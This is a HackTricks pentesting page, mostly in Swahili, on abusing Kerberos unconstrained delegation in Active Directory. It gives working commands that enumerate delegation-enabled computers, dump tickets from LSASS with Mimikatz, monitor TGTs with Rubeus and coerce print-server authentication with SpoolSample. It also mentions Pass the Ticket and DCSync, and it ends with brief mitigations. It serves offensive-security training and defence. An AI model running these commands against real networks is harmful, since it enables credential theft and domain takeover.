Unconstrained Delegation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Unconstrained delegation

Hii ni kipengele ambacho Msimamizi wa Kikoa anaweza kuweka kwa Kompyuta yoyote ndani ya kikoa. Kisha, wakati wowote mtumiaji anapoingia kwenye Kompyuta, nakala ya TGT ya mtumiaji huyo itatumwa ndani ya TGS inayotolewa na DC na kuhifadhiwa kwenye kumbukumbu katika LSASS. Hivyo, ikiwa una mamlaka ya Msimamizi kwenye mashine, utaweza kudondosha tiketi na kujifanya kuwa watumiaji kwenye mashine yoyote.

Hivyo ikiwa msimamizi wa kikoa anaingia ndani ya Kompyuta yenye kipengele cha "Unconstrained Delegation" kimewashwa, na una mamlaka ya msimamizi wa ndani kwenye mashine hiyo, utaweza kudondosha tiketi na kujifanya kuwa Msimamizi wa Kikoa popote (domain privesc).

Unaweza kupata vitu vya Kompyuta vyenye sifa hii ukichunguza ikiwa sifa ya userAccountControl ina ADS_UF_TRUSTED_FOR_DELEGATION. Unaweza kufanya hivi kwa kutumia kichujio cha LDAP cha ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, ambacho powerview inafanya:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Pakia tiketi ya Msimamizi (au mtumiaji waathirika) kwenye kumbukumbu kwa Mimikatz au Rubeus kwa Pass the Ticket. Maelezo zaidi: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Maelezo zaidi kuhusu Unconstrained delegation katika ired.team.

Force Authentication

Ikiwa mshambuliaji anaweza kudhoofisha kompyuta iliyo ruhusiwa kwa "Unconstrained Delegation", anaweza kudanganya Print server ku ingia kiotomatiki dhidi yake akihifadhi TGT kwenye kumbukumbu ya seva. Kisha, mshambuliaji anaweza kufanya Pass the Ticket attack kujifanya kuwa mtumiaji wa akaunti ya kompyuta ya Print server.

Ili kufanya print server iingie dhidi ya mashine yoyote unaweza kutumia SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Ikiwa TGT inatoka kwa kiongozi wa eneo, unaweza kufanya DCSync attack na kupata hash zote kutoka DC. Maelezo zaidi kuhusu shambulio hili katika ired.team.

Hapa kuna njia nyingine za kujaribu kulazimisha uthibitisho:

Force NTLM Privileged Authentication

Mitigation

Punguza logins za DA/Admin kwa huduma maalum
Weka "Account is sensitive and cannot be delegated" kwa akaunti zenye mamlaka.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSkeleton Key NextWindows Security Controls

Last updated 7 days ago